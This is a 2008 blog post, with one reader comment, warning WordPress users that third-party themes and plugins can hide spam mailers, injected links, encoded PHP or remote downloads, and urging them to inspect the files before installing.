Wordpress security issues - inviting the hackers in and brewing them a tea

If like me you think Wordpress is a great cms you’ve probably installed several templates and plugins. But do you know what exactly it is you are installing?

Chances are unless you are a PHP programmer you won’t have given this a second thought.

So what is it you are installing?
Wordpress plugins and some templates contain code that performs a particular task. Some of my favourite plugins are listed here

So what’s the security issue?
Those plugins and templates could be malicious!

Most of us take precautions when downloading programs and files on to our desktops, but happily install plungins and templates on servers without giving it a second thought. So now you have your nice new shiny template installed, but what else is it doing? Possibilities are endless, you could be opening your server up for sending out spam, or leaving your company server open to attack.

In the last few week alone I’ve seen..

templates email that send out emails when installed
plugins inserting hidden links in all your posts
mystery encoded php in templates
plugins that install extra php files from remote servers

So what can you do?
Until there is a online system where plugins and templates are checked for security holes, and we’re able to download them from a verified source, all we can do is be very careful.. Before installing look through those template and plugin files, and check for suspicious code.

Share this article: These icons link to social bookmarking sites where readers can share and discover new web pages.

RSS 2.0

Sunday, March 23rd, 2008 at 10:45 pm
Wordpress
No Tags
Trackback

Monkey in a suit & travolution awards 2008

May 1st, 2008 Here's a picture of a Northern monkey in a suit - not that unusual except this one was collecting an award and not in

SEO agencies with big brands spam more

April 23rd, 2008 There are SEO agencies that consistently land big name clients. Do they get results? Yes! Do they offer value for mon

Wordpress theme competition

March 30th, 2008 Over at Adii.co.za there's a competition to win the Developer’s Package of wordpress themes. What's so good about

wordpress 2.5 is here

March 30th, 2008 The long awaited version 2.5 of wordpress is here WordPress 2.5, the culmination of six months of work by the WordPre

Wordpress security issues - inviting the hackers in and brewing them a tea

March 23rd, 2008 If like me you think Wordpress is a great cms you’ve probably installed several templates and plugins. But do you kno

SEOidiot
March 24th, 2008 at 11:33 pm

Someone just sent me a link here saying what a great article it was - i didnt realise it was you till I got half way through !

Template files yes - rife with issues - look in functions.php for stuff
What the sneaky people do is change the content call to something that sounds the same like the-content or the_content or the.content etc and then hide that in the functions.php really really really far right and really really far down….

I like the do follow plugin that emails the post url back to a site after every new post - guess what the author uses that info for?

Paul

Paulh
March 26th, 2008 at 11:59 am